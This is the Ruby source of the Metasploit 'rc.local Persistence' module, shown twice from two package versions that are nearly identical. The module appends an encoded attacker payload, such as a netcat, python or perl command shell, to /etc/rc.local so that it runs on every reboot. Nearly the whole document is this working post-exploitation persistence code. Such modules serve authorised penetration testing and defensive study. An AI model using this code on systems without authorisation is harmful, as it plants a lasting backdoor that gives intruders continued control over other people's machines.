==> metasploit-5.0.73-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/linux/local/rc_local_persistence.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'rc.local Persistence',
      'Description'    => %q(
        This module will edit /etc/rc.local in order to persist a payload.
        The payload will be executed on the next reboot.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Eliott Teissonniere' ],
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
        'BadChars'   => "#%\n",
        'Compat'     => {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic python ruby netcat perl'
        }
      },
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
      'DisclosureDate' => 'Oct 01 1980', # The rc command appeared in 4.0BSD.
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0
    ))
  end

  def exploit
    rc_path = '/etc/rc.local'

    unless writable? rc_path
      fail_with Failure::BadConfig, "#{rc_path} is not writable"
    end

    print_status "Reading #{rc_path}"

    # read /etc/rc.local, but remove `exit 0`
    rc_local = read_file(rc_path).gsub(/^exit.*$/, '')

    # add payload and put back `exit 0`
    rc_local << "\n#{payload.encoded}\nexit 0\n"

    # write new file
    print_status "Patching #{rc_path}"
    write_file(rc_path, rc_local)
  end
end

==> metasploit-6.0.37-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/linux/local/rc_local_persistence.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'rc.local Persistence',
      'Description'    => %q(
        This module will edit /etc/rc.local in order to persist a payload.
        The payload will be executed on the next reboot.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Eliott Teissonniere' ],
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
        'BadChars'   => "#%\n",
        'Compat'     => {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic python ruby netcat perl'
        }
      },
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
      'DisclosureDate' => '1980-10-01', # The rc command appeared in 4.0BSD.
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0
    ))
  end

  def exploit
    rc_path = '/etc/rc.local'

    unless writable? rc_path
      fail_with Failure::BadConfig, "#{rc_path} is not writable"
    end

    print_status "Reading #{rc_path}"

    # read /etc/rc.local, but remove `exit 0`
    rc_local = read_file(rc_path).gsub(/^exit.*$/, '')

    # add payload and put back `exit 0`
    rc_local << "\n#{payload.encoded}\nexit 0\n"

    # write new file
    print_status "Patching #{rc_path}"
    write_file(rc_path, rc_local)
  end
end
